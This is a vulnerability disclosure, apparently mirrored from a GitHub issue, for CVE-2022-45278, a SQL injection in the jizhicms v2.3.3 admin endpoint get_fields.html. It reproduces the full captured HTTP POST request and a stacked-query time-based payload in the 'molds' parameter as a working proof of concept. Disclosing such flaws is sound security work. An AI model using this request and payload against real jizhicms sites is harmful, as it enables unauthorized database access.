Headline

CVE-2022-45278: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #83 · Cherry-toto/jizhicms

Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /index.php/admins/Fields/get_fields.html component.

2 years ago

CVE

Open in Source

#sql #vulnerability #windows #php #firefox

This is one of my favorite CMS, but I found a system vulnerability.
name：jizhicms
version: v2.3.3
Installation package download：

Problematic packets:

POST /index.php/admins/Fields/get_fields.html HTTP/1.1
Host: 192.168.23.130:49158
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://192.168.23.130:49158
Connection: close
Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs

molds=tags&tid=0&id=1

Background ->SEO settings ->TGA list ->edit, and then capture packages

Vulnerability verification exists

payload

Parameter: molds (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

1 year ago

1 year ago

1 year ago

1 year ago

1 year ago